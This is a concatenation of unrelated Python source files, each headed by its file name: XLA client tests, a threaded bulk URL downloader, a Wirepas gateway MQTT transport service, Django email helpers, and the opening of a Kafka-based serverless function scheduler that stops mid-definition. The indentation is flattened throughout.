@unittest.skipIf(cloud_tpu or tfrt_tpu or external_tpu, "not implemented")
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes + float_dtypes)
def testReshape2D(self, dtype):
arg0 = np.array([[1, 2, 3], [4, 5, 6]], dtype=dtype)
arg1 = np.array(2, dtype=np.int32)
expected = np.array([[1, 2], [4, 5]], dtype=np.int32)
c = self._NewComputation()
p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
p1 = ops.Parameter(c, 1, xla_client.shape_from_pyval(arg1))
ops.DynamicReshape(p0, [p1, p1], [2, 3], [False, True])
self._CompareToPyAndBufferProtocol(c, [arg0, arg1], [expected],
np.testing.assert_equal)
@unittest.skipIf(cloud_tpu or tfrt_tpu, "not implemented")
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes + float_dtypes)
def testDynamicShapeArgs(self, dtype):
full_size = 10
dynamic_shape_size = 4
# subcomputation 1
binary_add_builder = self._NewComputation()
scalar_shape = xla_client.Shape.scalar_shape(np.dtype(dtype))
ops.Add(
ops.Parameter(binary_add_builder, 0, scalar_shape),
ops.Parameter(binary_add_builder, 1, scalar_shape))
# subcomputation 2
reshape_reduce_builder = self._NewComputation()
dshape = xla_client.Shape.array_shape(
np.dtype(dtype), dims=[full_size], dynamic_dimensions=[True])
reshape_reduce_p = ops.Parameter(reshape_reduce_builder, 0, dshape)
ops.Reduce(
reshape_reduce_builder,
operands=[reshape_reduce_p],
init_values=[ops.Constant(reshape_reduce_builder, dtype(0))],
computation=binary_add_builder.build(),
dimensions_to_reduce=[0])
# main computation: sum(range(full_size)[:dynamic_shape_size])
c = self._NewComputation()
arg = np.array(dynamic_shape_size, dtype=np.int32)
p = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg))
reshaped = ops.DynamicReshape(
ops.Constant(c, np.array(range(full_size), dtype=dtype)), [p],
[full_size], [True])
ops.Call(c, reshape_reduce_builder.build(), operands=(reshaped,))
self._ExecuteAndCompareClose(c, [arg], [dtype(6)])
tests.append(DynamicReshapeTest)
class DeviceAssignmentTest(ComputationTest):
def testSerialize(self):
shape = (3, 4)
device_assignment = xla_client.DeviceAssignment.create(
np.arange(np.prod(shape)).reshape(*shape))
self.assertEqual(device_assignment.replica_count(), shape[0])
self.assertEqual(device_assignment.computation_count(), shape[1])
serialized = device_assignment.serialize()
self.assertIsInstance(serialized, bytes)
self.assertNotEmpty(serialized)
tests.append(DeviceAssignmentTest)
return tests
def InstantiateTests(globals_dict, backend_fn, test_prefix="", **kw):
# Avoid creating a new backend per test (this causes GPU OOM, and is probably
# inefficient).
backend_fn = functools.lru_cache(maxsize=None)(backend_fn)
for klass in TestFactory(backend_fn, **kw):
test = type(test_prefix + klass.__name__, (klass,), {})
# Clean up the qualified names of the tests to not include the test factory.
test.__qualname__ = test.__name__
globals_dict[test.__name__] = test
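# A minimal usage sketch (hypothetical names): an out-of-tree backend test
# module could reuse this factory with its own client constructor and a
# distinct test prefix so the generated classes do not clash, e.g.:
#
#   import my_plugin_backend  # hypothetical package
#   InstantiateTests(globals(), my_plugin_backend.make_client,
#                    test_prefix="MyPlugin")
#
# The default instantiation for the bundled CPU/GPU clients follows below.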
backends = {
"cpu": xla_client.make_cpu_client,
"gpu": xla_client.make_gpu_client,
}
if __name__ == "__main__":
flags.DEFINE_string("backend", "cpu", "Target platform.")
# pylint: disable=unnecessary-lambda
InstantiateTests(globals(), lambda: backends[FLAGS.backend]())
# pylint: enable=unnecessary-lambda
absltest.main()
|
bulk_downloader.py
|
import os, sys
from threading import Thread
import requests
from time import time
import queue
import logging
import progressbar
class fetchURLs(object):
'''
Download and save a list of URLs
using parallel connections. A separate session is maintained for each
download thread. If throttling is detected (broken connections)
the thread is terminated in order to reduce the load on the web server.
If a local file already exists for a given URL, that URL is skipped.
There is currently no check whether the remote document is newer than the
local file. If the URL does not end with a file name, fetchURLs
will generate a default filename in the format <website>.index.html
:param urls: A list of absolute URLs to fetch
:param data_dir: Directory to save files in
:param connections: Number of simultaneous download threads
:param auth: Username and password tuple, if needed for website authentication
:param log: An optional logging.getLogger() instance
This class is usually called from IceCat
'''
def __init__(self,
log=None,
urls = [
'http://www.google.com/',
'http://www.bing.com/',
'http://www.yahoo.com/',
],
data_dir = '_data/product_xml/',
auth=('goober@aol.com','password'),
connections=5):
self.urls = queue.Queue()
for i in urls:
self.urls.put(i)
self.data_dir = data_dir
self.connections = connections
self.auth = auth
self.log = log
if not log:
self.log = logging.getLogger()
logging.getLogger("requests").setLevel(logging.WARNING)
# self.log.setLevel(logging.WARNING)
print("Downloading product details:")
with progressbar.ProgressBar(max_value=len(urls)) as self.bar:
self._download()
def _worker(self):
s = requests.Session()
s.auth = self.auth
while True:
url = self.urls.get()
self.bar.update(self.success_count)
bn = os.path.basename(url)
if not bn:
file = self.data_dir + os.path.basename(os.path.dirname(url)) + '.index.html'
else:
file = self.data_dir + bn
if os.path.isfile(file):
modified = os.path.getmtime(file)
# headers = {'If-Modified-Since': } # do this later
# self.log.warning("Skipping {} - file exists".format(url))
self.urls.task_done()
self.success_count += 1
continue
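# A possible extension (not implemented here, sketched under the assumption
# that the server honors conditional requests): instead of always skipping
# an existing file, send the local mtime and only re-download when the
# server reports a newer document, e.g.:
#   from email.utils import formatdate
#   headers = {'If-Modified-Since': formatdate(modified, usegmt=True)}
#   res = s.get(url, headers=headers)
#   if res.status_code == 304:
#       ...  # local copy is up to date, skip the write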
try:
res = s.get(url)
except Exception:
self.log.warning("Bad request {} for url: {}".format(sys.exc_info(), url))
# put the item back into the queue
self.urls.put(url)
self.urls.task_done()
# this could be due to throttling, exit thread
break
if 200 <= res.status_code < 300:
self.success_count += 1
self.log.debug("Fetched {}".format(url))
else:
self.log.warning("Bad status code: {} for url: {}".format(res.status_code, url))
self.urls.task_done()
continue
with open(file, 'wb') as f:
for chunk in res.iter_content(chunk_size=1024*1024):
if chunk:
f.write(chunk)
self.urls.task_done()
def _download(self):
self.success_count = 0
if not os.path.exists(self.data_dir):
os.makedirs(self.data_dir)
start = time()
for i in range(self.connections):
t = Thread(target=self._worker)
t.daemon = True
t.start()
self.urls.join()
self.log.info('fetched {} URLs in {:0.3f}s'.format(self.success_count, time() - start))
def get_count(self):
'''
Returns the number of successfully fetched urls
'''
return self.success_count
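# A minimal usage sketch, assuming this module is run directly and that the
# URLs and output directory below are placeholders. The class downloads
# everything in its constructor, so get_count() can be read right after it
# returns.
if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO)
    sample_urls = [
        "http://example.com/catalog/item1.xml",  # placeholder URLs
        "http://example.com/catalog/item2.xml",
    ]
    fetcher = fetchURLs(urls=sample_urls, data_dir="_data/product_xml/",
                        auth=None, connections=2)
    print("Fetched {} of {} URLs".format(fetcher.get_count(), len(sample_urls)))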
|
transport_service.py
|
# Copyright 2019 Wirepas Ltd licensed under Apache License, Version 2.0
#
# See file LICENSE for full license details.
#
import logging
import os
from time import time
from uuid import getnode
from threading import Thread
import wirepas_messaging
from wirepas_gateway.dbus.dbus_client import BusClient
from wirepas_gateway.protocol.topic_helper import TopicGenerator, TopicParser
from wirepas_gateway.protocol.mqtt_wrapper import MQTTWrapper
from wirepas_gateway.utils import ParserHelper
from wirepas_gateway.utils import LoggerHelper
from wirepas_messaging.gateway.api import (
GatewayResultCode,
GatewayState,
GatewayAPIParsingException,
)
from wirepas_gateway import __version__ as transport_version
from wirepas_gateway import __pkg_name__
# This constant is the actual API level implemented by this transport module (cf WP-RM-128)
IMPLEMENTED_API_VERSION = 1
class TransportService(BusClient):
"""
Implementation of the gateway to backend protocol.
Gets all the events from DBUS and publishes them with the right
format to the backend.
"""
# Maximum hop limit to send a packet is limited to 15 by API (4 bits)
MAX_HOP_LIMIT = 15
def __init__(self, settings, logger=None, **kwargs):
self.logger = logger or logging.getLogger(__name__)
self.logger.info("Version is: %s", transport_version)
super(TransportService, self).__init__(
logger=logger,
c_extension=(settings.full_python is False),
ignored_ep_filter=settings.ignored_endpoints_filter,
**kwargs
)
self.gw_id = settings.gateway_id
self.gw_model = settings.gateway_model
self.gw_version = settings.gateway_version
self.whitened_ep_filter = settings.whitened_endpoints_filter
last_will_topic = TopicGenerator.make_status_topic(self.gw_id)
last_will_message = wirepas_messaging.gateway.api.StatusEvent(
self.gw_id, GatewayState.OFFLINE
).payload
self.mqtt_wrapper = MQTTWrapper(
settings,
self.logger,
self._on_mqtt_wrapper_termination_cb,
self._on_connect,
last_will_topic,
last_will_message,
)
self.mqtt_wrapper.start()
self.logger.info("Gateway started with id: %s", self.gw_id)
def _on_mqtt_wrapper_termination_cb(self):
"""
        Callback invoked when the MQTT wrapper has exited.
        This is not a normal situation, so it is better to exit the program
        to have a chance to restart from a clean session.
"""
self.logger.error("MQTT wrapper ends. Terminate the program")
self.stop_dbus_client()
def _set_status(self):
event_online = wirepas_messaging.gateway.api.StatusEvent(
self.gw_id, GatewayState.ONLINE
)
topic = TopicGenerator.make_status_topic(self.gw_id)
self.mqtt_wrapper.publish(topic, event_online.payload, qos=1, retain=True)
def _on_connect(self):
# Register for get gateway info
topic = TopicGenerator.make_get_gateway_info_request_topic(self.gw_id)
self.mqtt_wrapper.subscribe(topic, self._on_get_gateway_info_cmd_received)
# Register for get configs request
topic = TopicGenerator.make_get_configs_request_topic(self.gw_id)
self.mqtt_wrapper.subscribe(topic, self._on_get_configs_cmd_received)
# Register for set config request for any sink
topic = TopicGenerator.make_set_config_request_topic(self.gw_id)
self.mqtt_wrapper.subscribe(topic, self._on_set_config_cmd_received)
# Register for send data request for any sink on the gateway
topic = TopicGenerator.make_send_data_request_topic(self.gw_id)
self.logger.debug("Subscribing to: %s", topic)
        # It is important to use qos 2 here (and also on the publisher side), as
        # qos 1 could generate duplicated packets and we don't know the
        # consequences on the end application
self.mqtt_wrapper.subscribe(topic, self._on_send_data_cmd_received, qos=2)
# Register for otap commands for any sink on the gateway
topic = TopicGenerator.make_otap_status_request_topic(self.gw_id)
self.mqtt_wrapper.subscribe(topic, self._on_otap_status_request_received)
topic = TopicGenerator.make_otap_load_scratchpad_request_topic(self.gw_id)
self.mqtt_wrapper.subscribe(
topic, self._on_otap_upload_scratchpad_request_received
)
topic = TopicGenerator.make_otap_process_scratchpad_request_topic(self.gw_id)
self.mqtt_wrapper.subscribe(
topic, self._on_otap_process_scratchpad_request_received
)
self._set_status()
self.logger.info("MQTT connected!")
def on_data_received(
self,
sink_id,
timestamp,
src,
dst,
src_ep,
dst_ep,
travel_time,
qos,
hop_count,
data,
):
if self.whitened_ep_filter is not None and dst_ep in self.whitened_ep_filter:
# Only publish payload size but not the payload
self.logger.debug("Filtering payload data")
            data_size = len(data)
data = None
else:
data_size = None
event = wirepas_messaging.gateway.api.ReceivedDataEvent(
gw_id=self.gw_id,
sink_id=sink_id,
rx_time_ms_epoch=timestamp,
src=src,
dst=dst,
src_ep=src_ep,
dst_ep=dst_ep,
travel_time_ms=travel_time,
qos=qos,
data=data,
data_size=data_size,
hop_count=hop_count,
)
sink = self.sink_manager.get_sink(sink_id)
if sink is None:
# It can happen at sink connection as messages can be received
# before sinks are identified
            self.logger.info(
                "Message received from sink %s, which is not identified yet", sink_id
            )
return
network_address = sink.get_network_address()
topic = TopicGenerator.make_received_data_topic(
self.gw_id, sink_id, network_address, src_ep, dst_ep
)
self.logger.debug("Sending data to: %s", topic)
# Set qos to 1 to avoid loading too much the broker
# unique id in event header can be used for duplicate filtering in
# backends
self.mqtt_wrapper.publish(topic, event.payload, qos=1)
def on_stack_started(self, name):
sink = self.sink_manager.get_sink(name)
if sink is None:
self.logger.error("Sink started %s error: unknown sink", name)
return
# Generate a setconfig answer with req_id of 0
response = wirepas_messaging.gateway.api.SetConfigResponse(
0, self.gw_id, GatewayResultCode.GW_RES_OK, sink.sink_id, sink.read_config()
)
topic = TopicGenerator.make_set_config_response_topic(self.gw_id, sink.sink_id)
self.mqtt_wrapper.publish(topic, response.payload, qos=2)
def _send_asynchronous_get_configs_response(self):
# Create a list of different sink configs
configs = []
for sink in self.sink_manager.get_sinks():
config = sink.read_config()
if config is not None:
configs.append(config)
# Generate a setconfig answer with req_id of 0 as not from
# a real request
response = wirepas_messaging.gateway.api.GetConfigsResponse(
0, self.gw_id, GatewayResultCode.GW_RES_OK, configs
)
topic = TopicGenerator.make_get_configs_response_topic(self.gw_id)
self.mqtt_wrapper.publish(topic, response.payload, qos=2)
def deferred_thread(fn):
"""
Decorator to handle a request on its own Thread
to avoid blocking the calling Thread on I/O.
        It creates a new Thread, but this shouldn't impact performance
        as requests are not supposed to be very frequent (a few per second)
"""
def wrapper(*args, **kwargs):
thread = Thread(target=fn, args=args, kwargs=kwargs)
thread.start()
return thread
return wrapper
def on_sink_connected(self, name):
self.logger.info("Sink connected, sending new configs")
self._send_asynchronous_get_configs_response()
def on_sink_disconnected(self, name):
self.logger.info("Sink disconnected, sending new configs")
self._send_asynchronous_get_configs_response()
@deferred_thread
def _on_send_data_cmd_received(self, client, userdata, message):
# pylint: disable=unused-argument
self.logger.info("Request to send data")
try:
request = wirepas_messaging.gateway.api.SendDataRequest.from_payload(
message.payload
)
except GatewayAPIParsingException as e:
self.logger.error(str(e))
return
# Get the sink-id from topic
_, sink_id = TopicParser.parse_send_data_topic(message.topic)
self.logger.debug("Request for sink %s", sink_id)
sink = self.sink_manager.get_sink(sink_id)
if sink is not None:
if request.hop_limit > self.MAX_HOP_LIMIT:
res = GatewayResultCode.INVALID_MAX_HOP_COUNT
else:
res = sink.send_data(
request.destination_address,
request.source_endpoint,
request.destination_endpoint,
request.qos,
request.initial_delay_ms,
request.data_payload,
request.is_unack_csma_ca,
request.hop_limit,
)
else:
self.logger.warning("No sink with id: %s", sink_id)
# No sink with this id
res = GatewayResultCode.GW_RES_INVALID_SINK_ID
# Answer to backend
response = wirepas_messaging.gateway.api.SendDataResponse(
request.req_id, self.gw_id, res, sink_id
)
topic = TopicGenerator.make_send_data_response_topic(self.gw_id, sink_id)
self.mqtt_wrapper.publish(topic, response.payload, qos=2)
@deferred_thread
def _on_get_configs_cmd_received(self, client, userdata, message):
# pylint: disable=unused-argument
self.logger.info("Config request received")
try:
request = wirepas_messaging.gateway.api.GetConfigsRequest.from_payload(
message.payload
)
except GatewayAPIParsingException as e:
self.logger.error(str(e))
return
# Create a list of different sink configs
configs = []
for sink in self.sink_manager.get_sinks():
config = sink.read_config()
if config is not None:
configs.append(config)
response = wirepas_messaging.gateway.api.GetConfigsResponse(
request.req_id, self.gw_id, GatewayResultCode.GW_RES_OK, configs
)
topic = TopicGenerator.make_get_configs_response_topic(self.gw_id)
self.mqtt_wrapper.publish(topic, response.payload, qos=2)
def _on_get_gateway_info_cmd_received(self, client, userdata, message):
# pylint: disable=unused-argument
"""
        This function doesn't need the @deferred_thread decorator as the request
        is handled without I/O
"""
self.logger.info("Gateway info request received")
try:
request = wirepas_messaging.gateway.api.GetGatewayInfoRequest.from_payload(
message.payload
)
except GatewayAPIParsingException as e:
self.logger.error(str(e))
return
response = wirepas_messaging.gateway.api.GetGatewayInfoResponse(
request.req_id,
self.gw_id,
GatewayResultCode.GW_RES_OK,
current_time_s_epoch=int(time()),
gateway_model=self.gw_model,
gateway_version=self.gw_version,
implemented_api_version=IMPLEMENTED_API_VERSION,
)
topic = TopicGenerator.make_get_gateway_info_response_topic(self.gw_id)
self.mqtt_wrapper.publish(topic, response.payload, qos=2)
@deferred_thread
def _on_set_config_cmd_received(self, client, userdata, message):
# pylint: disable=unused-argument
self.logger.info("Set config request received")
try:
request = wirepas_messaging.gateway.api.SetConfigRequest.from_payload(
message.payload
)
except GatewayAPIParsingException as e:
self.logger.error(str(e))
return
self.logger.debug("Set sink config: %s", request)
sink = self.sink_manager.get_sink(request.sink_id)
if sink is not None:
res = sink.write_config(request.new_config)
new_config = sink.read_config()
else:
res = GatewayResultCode.GW_RES_INVALID_SINK_ID
new_config = None
response = wirepas_messaging.gateway.api.SetConfigResponse(
request.req_id, self.gw_id, res, request.sink_id, new_config
)
topic = TopicGenerator.make_set_config_response_topic(
self.gw_id, request.sink_id
)
self.mqtt_wrapper.publish(topic, response.payload, qos=2)
@deferred_thread
def _on_otap_status_request_received(self, client, userdata, message):
# pylint: disable=unused-argument
self.logger.info("OTAP status request received")
try:
request = wirepas_messaging.gateway.api.GetScratchpadStatusRequest.from_payload(
message.payload
)
except GatewayAPIParsingException as e:
self.logger.error(str(e))
return
sink = self.sink_manager.get_sink(request.sink_id)
if sink is not None:
d = sink.get_scratchpad_status()
response = wirepas_messaging.gateway.api.GetScratchpadStatusResponse(
request.req_id,
self.gw_id,
GatewayResultCode.GW_RES_OK,
request.sink_id,
d["stored_scartchpad"],
d["stored_status"],
d["stored_type"],
d["processed_scartchpad"],
d["firmware_area_id"],
)
else:
response = wirepas_messaging.gateway.api.GetScratchpadStatusResponse(
request.req_id,
self.gw_id,
GatewayResultCode.GW_RES_INVALID_SINK_ID,
request.sink_id,
)
topic = TopicGenerator.make_otap_status_response_topic(
self.gw_id, request.sink_id
)
self.mqtt_wrapper.publish(topic, response.payload, qos=2)
@deferred_thread
def _on_otap_upload_scratchpad_request_received(self, client, userdata, message):
# pylint: disable=unused-argument
self.logger.info("OTAP upload request received")
try:
request = wirepas_messaging.gateway.api.UploadScratchpadRequest.from_payload(
message.payload
)
except GatewayAPIParsingException as e:
self.logger.error(str(e))
return
self.logger.info("OTAP upload request received for %s", request.sink_id)
sink = self.sink_manager.get_sink(request.sink_id)
if sink is not None:
res = sink.upload_scratchpad(request.seq, request.scratchpad)
else:
res = GatewayResultCode.GW_RES_INVALID_SINK_ID
response = wirepas_messaging.gateway.api.UploadScratchpadResponse(
request.req_id, self.gw_id, res, request.sink_id
)
topic = TopicGenerator.make_otap_upload_scratchpad_response_topic(
self.gw_id, request.sink_id
)
self.mqtt_wrapper.publish(topic, response.payload, qos=2)
@deferred_thread
def _on_otap_process_scratchpad_request_received(self, client, userdata, message):
# pylint: disable=unused-argument
self.logger.info("OTAP process request received")
try:
request = wirepas_messaging.gateway.api.ProcessScratchpadRequest.from_payload(
message.payload
)
except GatewayAPIParsingException as e:
self.logger.error(str(e))
return
sink = self.sink_manager.get_sink(request.sink_id)
if sink is not None:
res = sink.process_scratchpad()
else:
res = GatewayResultCode.GW_RES_INVALID_SINK_ID
response = wirepas_messaging.gateway.api.ProcessScratchpadResponse(
request.req_id, self.gw_id, res, request.sink_id
)
topic = TopicGenerator.make_otap_process_scratchpad_response_topic(
self.gw_id, request.sink_id
)
self.mqtt_wrapper.publish(topic, response.payload, qos=2)
def parse_setting_list(list_setting):
""" This function parse ep list specified from setting file or cmd line
Input list has following format [1, 5, 10-15] as a string or list of string
and is expended as a single list [1, 5, 10, 11, 12, 13, 14, 15]
Args:
list_setting(str or list): the list from setting file or cmd line.
Returns: A single list of ep
"""
if isinstance(list_setting, str):
# List is a string from cmd line
list_setting = list_setting.replace("[", "")
list_setting = list_setting.replace("]", "")
list_setting = list_setting.split(",")
single_list = []
for ep in list_setting:
# Check if ep is directly an int
if isinstance(ep, int):
if ep < 0 or ep > 255:
raise SyntaxError("EP out of bound")
single_list.append(ep)
continue
# Check if ep is a single ep as string
try:
ep = int(ep)
if ep < 0 or ep > 255:
raise SyntaxError("EP out of bound")
single_list.append(ep)
continue
except ValueError:
# Probably a range
pass
# Check if ep is a range
try:
ep = ep.replace("'", "")
lower, upper = ep.split("-")
lower = int(lower)
upper = int(upper)
if lower > upper or lower < 0 or upper > 255:
raise SyntaxError("Wrong EP range value")
single_list += list(range(lower, upper + 1))
except (AttributeError, ValueError):
raise SyntaxError("Wrong EP range format")
return single_list
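# A minimal usage sketch (not part of the original module) for parse_setting_list;
# the values below are illustrative only.
def _parse_setting_list_example():
    # String form, as passed on the command line
    assert parse_setting_list("[1, 5, 10-12]") == [1, 5, 10, 11, 12]
    # List form, as read from a settings file (ints, numeric strings and ranges)
    assert parse_setting_list([1, "5", "10-12"]) == [1, 5, 10, 11, 12]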
def _check_duplicate(args, old_param, new_param, default, logger):
old_param_val = getattr(args, old_param, default)
new_param_val = getattr(args, new_param, default)
if new_param_val == old_param_val:
# Nothing to update
return
if old_param_val != default:
# Old param is set, check if new_param is also set
if new_param_val == default:
setattr(args, new_param, old_param_val)
logger.warning(
"Param %s is deprecated, please use %s instead", old_param, new_param
)
else:
logger.error(
"Param %s and %s cannot be set at the same time", old_param, new_param
)
exit()
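# A hedged sketch (not part of the original module) of the deprecated-parameter
# migration done by _check_duplicate; the Namespace fields and values below are
# assumptions for illustration.
def _check_duplicate_example(logger):
    from argparse import Namespace
    args = Namespace(host="broker.example.com", mqtt_hostname=None)
    # The old parameter is set and the new one is at its default: the value is
    # copied over and a deprecation warning is logged.
    _check_duplicate(args, "host", "mqtt_hostname", None, logger)
    assert args.mqtt_hostname == "broker.example.com"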
def _update_parameters(settings, logger):
"""
    Function to handle backward compatibility with old parameter names
Args:
settings: Full parameters
Returns: None
"""
_check_duplicate(settings, "host", "mqtt_hostname", None, logger)
_check_duplicate(settings, "port", "mqtt_port", 8883, logger)
_check_duplicate(settings, "username", "mqtt_username", None, logger)
_check_duplicate(settings, "password", "mqtt_password", None, logger)
_check_duplicate(settings, "tlsfile", "mqtt_certfile", None, logger)
_check_duplicate(
settings, "unsecure_authentication", "mqtt_force_unsecure", False, logger
)
_check_duplicate(settings, "gwid", "gateway_id", None, logger)
if settings.gateway_id is None:
settings.gateway_id = str(getnode())
# Parse EP list that should not be published
if settings.ignored_endpoints_filter is not None:
try:
settings.ignored_endpoints_filter = parse_setting_list(
settings.ignored_endpoints_filter
)
logger.debug("Ignored endpoints are: %s", settings.ignored_endpoints_filter)
except SyntaxError as e:
logger.error("Wrong format for ignored_endpoints_filter EP list (%s)", e)
exit()
if settings.whitened_endpoints_filter is not None:
try:
settings.whitened_endpoints_filter = parse_setting_list(
settings.whitened_endpoints_filter
)
logger.debug(
"Whitened endpoints are: {}".format(settings.whitened_endpoints_filter)
)
except SyntaxError as e:
logger.error("Wrong format for whitened_endpoints_filter EP list (%s)", e)
exit()
def _check_parameters(settings, logger):
if settings.mqtt_force_unsecure and settings.mqtt_certfile:
# If tls cert file is provided, unsecure authentication cannot
# be set
logger.error("Cannot give certfile and disable secure authentication")
exit()
try:
if set(settings.ignored_endpoints_filter) & set(
settings.whitened_endpoints_filter
):
logger.error("Some endpoints are both ignored and whitened")
exit()
except TypeError:
# One of the filter list is None
pass
def main():
"""
Main service for transport module
"""
parse = ParserHelper(
description="Wirepas Gateway Transport service arguments",
version=transport_version,
)
parse.add_file_settings()
parse.add_mqtt()
parse.add_gateway_config()
parse.add_filtering_config()
parse.add_deprecated_args()
settings = parse.settings()
# Set default debug level
debug_level = "info"
try:
debug_level = os.environ["DEBUG_LEVEL"]
print(
"Deprecated environment variable DEBUG_LEVEL "
"(it will be dropped from version 2.x onwards)"
" please use WM_DEBUG_LEVEL instead."
)
except KeyError:
pass
try:
debug_level = os.environ["WM_DEBUG_LEVEL"]
except KeyError:
pass
log = LoggerHelper(module_name=__pkg_name__, level=debug_level)
logger = log.setup()
_update_parameters(settings, logger)
    # after this stage, the deprecated mqtt arguments cannot be used anymore
_check_parameters(settings, logger)
TransportService(settings=settings, logger=logger).run()
if __name__ == "__main__":
main()
|
methods.py
|
import logging
import threading
from django.conf import settings
from django.contrib import messages
from django.contrib.messages import get_messages
from django.core.mail import send_mail
from django.shortcuts import render
from django.test import TestCase
from django.utils.crypto import get_random_string
# from users.forms import CustomUserCreationForm # do not import this! https://stackoverflow.com/a/16975976/5394180
from sendgrid import Mail, SendGridAPIClient
def generate_token():
return get_random_string(length=32)
def send_mail_async(sender: str, receivers, subject, dynamic_template_data: dict, template_id):
message = Mail(
from_email=sender,
to_emails=receivers,
subject=subject,
)
message.dynamic_template_data = dynamic_template_data
message.template_id = template_id
sg = SendGridAPIClient(settings.SENDGRID_API_KEY)
t = threading.Thread(target=sg.send, args=(message,), name=f'email to {receivers}')
    t.daemon = True
t.start()
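# A hedged usage sketch (not part of the original module); the addresses and the
# SendGrid dynamic template id below are placeholders, not real values.
def _send_mail_async_example():
    send_mail_async(
        sender="noreply@example.com",
        receivers=["user@example.com"],
        subject="Welcome",
        dynamic_template_data={"first_name": "Ada", "token": generate_token()},
        template_id="d-0000000000000000000000000000000000",
    )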
def check_response_message(testcase: TestCase, response, expected_message):
response_messages = list(get_messages(response.wsgi_request))
    testcase.assertEqual(len(response_messages), 1)
testcase.assertEqual(str(response_messages[0]), expected_message)
|
serial_consumer.py
|
import time
import json
import queue
import socket
import requests
import threading
from sys import exit
from threading import Thread
from kafka import KafkaConsumer, KafkaProducer
from function_chains_pb2 import ChainState
from concurrent.futures import ThreadPoolExecutor
# Configuration
# Set to True to disable invoking serverless functions for testing
mock_invocations = True
# ip/port to listen on
logger_port = 10000
serverIp = "127.0.0.1"
# Scheduling Policies
# Uncomment only the desired policy
# Note that the simpleQueuePriorityPolicy requires the enqueue_simple_priority
# queueing policy to work.
# All other existing policies require enqueue_pending_or_running.
def scheduling_policy():
return currentlyRunningChainsPolicy()
#return getShortestJobFirst()
#return fairShareOnChainsPolicy()
#return fairShareOnFunctionsPolicy()
#return strictFunctionPriorityPolicy()
#return hybridBinPackingPolicy()
#return simpleQueuePriorityPolicy()
# Queueing Policies
# Uncomment only the desired policy
# The only scheduling policy that needs enqueue_simple_priority is
# simpleQueuePriorityPolicy, all others require enqueue_pending_or_running
def enqueue_invocation(invocation, chainAlreadyRunning):
return enqueue_pending_or_running(invocation, chainAlreadyRunning)
#return enqueue_simple_priority(invocation, chainAlreadyRunning)
# hybrid clouds
localCloudConcurrency = threading.Semaphore(200)
# logging details
chains_records = []
functions_records = []
logging_running_records = []
logging_finished_records = []
# arrivalRateQueue length
arrivalRateQueueLength = 30
# kafka queue timeout in milliseconds
kafkaTimeOut = 10
kafkaPQSoftLimit = 100
kafkaCRQSoftLimit = 100
# kafka queue length
kafkaCRQLength = 0
# in memory queue size
queueSize = 1000000
inMemorySleep = 0.0005
# threading details
fsMetricServerLock = threading.Lock()
csMetricServerLock = threading.Lock()
psMetricServerLock = threading.Lock()
kafkaCRQLengthLock = threading.Lock()
raceConditionLock = threading.Lock()
lockFunctionSideLogger = threading.Lock()
concurrency = 1000
threadPool = 1000
pool = threading.Semaphore(threadPool)
concurrencyPool = threading.Semaphore(concurrency)
# SJF dictionary - format (chainId, nodeId): average remaining runtime
SJFLookup = { (1,1): 20.2,
(1,2): 20,
(1,3): 20,
(2,1): 39,
(2,2): 19,
(2,3): 2,
(3,1): 37.2,
(3,2): 20,
(3,3): 37,
(3,4): 17}
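# For example, SJFLookup[(2, 3)] == 2, so node 3 of chain 2 has the shortest
# expected remaining runtime and would be preferred by getShortestJobFirst().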
# Main scheduling loop. After initializing a worker thread pool,
# we invoke the Policy Framework to choose the next function to invoke, then invoke it.
def schedule_invocations():
executor = ThreadPoolExecutor(max_workers=threadPool)
iter = 0
while(True):
timeStampList = []
timeStampList.append(iter)
timeStampList.append(time.time())
# Select a function to invoke
choice = scheduling_policy()
timeStampList.append(time.time())
# If a choice was made, submit it to the worker pool to execute
# Else, continue the loop
if (choice != None):
iter = iter + 1
raceConditionLock.acquire()
timeStampList.append(time.time())
executor.submit(invoker_thread, choice, timeStampList)
# Function Side Metric Server
# Only this or the consumer side metric server should call updateRecords(timeStamp)
def fsMetricServer():
while(True):
time.sleep(inMemorySleep)
if not(inMemoryFSQ.empty()):
timeStamp = inMemoryFSQ.get()
#print(timeStamp)
#updateRecords(timeStamp)
#print(metricServer.collectiveFunctionLevelMetric, metricServer.collectiveChainLevelMetric)
# Consumer Side Metric Server
# Only this or the function side metric server should call updateRecords(timeStamp)
def csMetricServer():
while(True):
time.sleep(inMemorySleep)
timeStamp = ""
if not(inMemoryCSSQ.empty()):
timeStamp = inMemoryCSSQ.get()
elif not(inMemoryCSEQ.empty()):
timeStamp = inMemoryCSEQ.get()
if (timeStamp != ""):
inMemoryCSL.put(timeStamp)
updateRecords(timeStamp)
print(metricServer.collectiveFunctionLevelMetric, metricServer.collectiveChainLevelMetric)
temp = json.loads(timeStamp.decode("utf-8").split("-")[3].replace("'", "\""))
#print(metricServer.individualFunctionMetricList[0]['instancesRunning'], time.time())
# Producer side metric server
# Processes metrics produced by the producer
def psMetricServer():
while(True):
time.sleep(inMemorySleep)
if not(inMemoryPSQ.empty()):
timeStamp = inMemoryPSQ.get()
updateArrivalRecords(timeStamp)
# Read Kafka messages into the in-memory pending queue for performance
def kafkaToInMemoryPQ():
while(True):
msg = consumer_PQ._poll_once(timeout_ms=kafkaTimeOut, max_records=1)
if (msg):
#print("kafka to memory")
for key,value in msg.items():
timeStamp = value[0].value
enqueue_invocation(timeStamp, chainAlreadyRunning=False)
# Read Kafka messages into the in-memory producer queue for performance
def kafkaToInMemoryPSQ():
while(True):
msg = consumer_PSQ._poll_once(timeout_ms=kafkaTimeOut, max_records=1)
if (msg):
#print("kafka to memory")
for key,value in msg.items():
timeStamp = value[0].value
inMemoryPSQ.put(timeStamp)
# Update function chain arrival metrics with a new timestamp
def updateArrivalsChainsMetricList(timeStamp):
psMetricServerLock.acquire()
newChainEntry = True
for i in metricServer.arrivalsChainsMetricList:
if (i['chainId'] == timeStamp.chainId):
newChainEntry = False
i['arrivalRateQueue'].append(timeStamp.start)
if (len(i['arrivalRateQueue']) > arrivalRateQueueLength):
i['arrivalRateQueue'].pop(0)
timeDifference = i['arrivalRateQueue'][-1] - i['arrivalRateQueue'][0]
i['arrivalRate'] = len(i['arrivalRateQueue'])/timeDifference
if (newChainEntry):
tempDictionary = { 'chainId': timeStamp.chainId,
